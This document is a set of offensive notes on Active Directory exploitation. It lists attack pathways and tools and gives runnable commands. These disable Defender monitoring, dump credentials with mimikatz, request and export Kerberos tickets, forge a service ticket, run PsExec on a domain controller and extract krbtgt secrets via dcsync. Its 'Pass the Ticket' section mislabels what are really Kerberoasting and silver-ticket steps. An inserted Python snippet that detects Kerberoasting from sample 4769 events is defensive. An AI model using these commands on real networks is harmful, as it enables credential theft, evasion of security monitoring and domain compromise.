Active Directory Exploitation
Overview
- Overview
- Enumeration and Exploitation Tools
- General Exploitation Pathway Examples
AD: General Pathways
A few of the many exploitation pathways:
- Exploiting a web-app --> lateral movement throughout the network --> domain compromise
- Exploiting a network/service vulnerability --> lateral movement throughout the network --> domain compromise
- Exploiting a client-side attack to compromise a user --> lateral movement --> domain compromise
Methods:
- Pass-The-Hash
- Pass-The-Ticket
- Overpass-The-Hash
- Kerberoasting
- As-Rep Roasting
- Golden Ticket
- Silver Ticket
- Password Spraying
AD: Enumeration and Assessment
After gaining access to a machine within an AD network, it is essential to enumerate the environment and understand the network, the domain, the machines within it, and where the compromised machine stands in relation to the environment (permissions, groups, routes to admin, etc.).
Enumeration of AD can be done in various ways, and many tools exist. Among the most popular and useful are SharpHound/BloodHound, PowerView, Impacket, and, of course, PowerShell.
Useful Resources:
https://wadcoms.github.io/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
Tools
- The impacket suite:
  - psexec.py
  - wmiexec.py
  - smbexec.py
- crackmapexec
- powerview
- sharphound / bloodhound
- mimikatz
- pypykatz
- winpeas / windows privescheck
- ldapmonitor
- responder
- rubeus
- kerbrute
Powerview
Disable Monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
Get Domain Info
Get-Domain
Get-DomainController
Get-Domain -Domain domain.local
Get-DomainController -Domain domain.local
Get-DomainUser
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
Invoke-ShareFinder
Invoke-MapDomainTrust
Using Bloodhound
File transfer --> download sharphound --> exfiltrate the data --> view data in bloodhound --> identify valuable accounts or pathways within the domain --> use relevant tools to try to exploit those accounts and move laterally
.\sharphound.exe -c Default,GPOLocalGroup,LoggedOn --zipfilename output
Use mimikatz to find vulnerable accounts with weak passwords to be used for further exploitation:
privilege::debug
sekurlsa::logonPasswords
Pass the Ticket Example
Identify service principals:
- Get-UserSPNs.ps1
Request a ticket for the vulnerable SPN (this can be done with mimikatz or via PowerShell):
PowerShell method:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN'
mimikatz method (example: the SPN is mssqlserver), after identifying an SPN whose account has domain controller access or access useful for lateral movement:
kerberos::purge
kerberos::list
kerberos::ask /target:mssqlserver
kerberos::list /export
kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-21-xxx-xxxx-xxxxx /target:domain.com /service:MSSQLServer /rc4:hash /ptt
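The service ticket requests above (whether made through KerberosRequestorSecurityToken or kerberos::ask) show up on the domain controller as Security event 4769, and a request for an RC4-encrypted (0x17) ticket for a non-machine service account is the classic sign of them. The following detection logic is an added example, not part of the original notes; it assumes the events have been flattened to key=value lines (a constructed SIEM-style export) and uses constructed sample records.

```python
import re
from collections import defaultdict

# Constructed sample 4769 (Kerberos service ticket request) events in a
# flattened key=value form (assumed SIEM export, not real Windows output).
# ServiceName is the service account the ticket was issued for.
SAMPLE_4769 = [
    "EventID=4769 TargetUserName=jsmith@CORP.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=jsmith@CORP.COM ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=jsmith@CORP.COM ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=WS01$@CORP.COM ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.9",
    "EventID=4769 TargetUserName=jdoe@CORP.COM ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.0.0.7",
    "EventID=4768 TargetUserName=jdoe@CORP.COM ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.7",
]

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value line into a dict of event fields."""
    return dict(FIELD_RE.findall(line))


def is_suspicious_tgs(ev):
    """True for an RC4 service ticket issued for a user (non-machine, non-krbtgt) service account."""
    if ev.get("EventID") != "4769":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower().startswith("krbtgt"):
        return False  # computer accounts and the TGT service are not roastable targets
    return ev.get("TicketEncryptionType") == RC4_HMAC


def find_kerberoast_candidates(lines, threshold=2):
    """Map requester -> sorted service accounts for requesters with >= threshold RC4 tickets."""
    per_user = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_suspicious_tgs(ev):
            per_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= threshold}


if __name__ == "__main__":
    for user, accounts in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"{user} requested RC4 service tickets for {len(accounts)} accounts: {', '.join(accounts)}")
```

Raising the threshold or adding a time window reduces noise from legacy applications that legitimately still request RC4 tickets; the durable fix is AES-only service accounts and long, managed service account passwords.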
Accessing the DC with Admin privileges:
PsExec64.exe \\domain-dc01 cmd.exe
pushd \\domain-dc01\c$
cd \\domain-dc01\c$
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt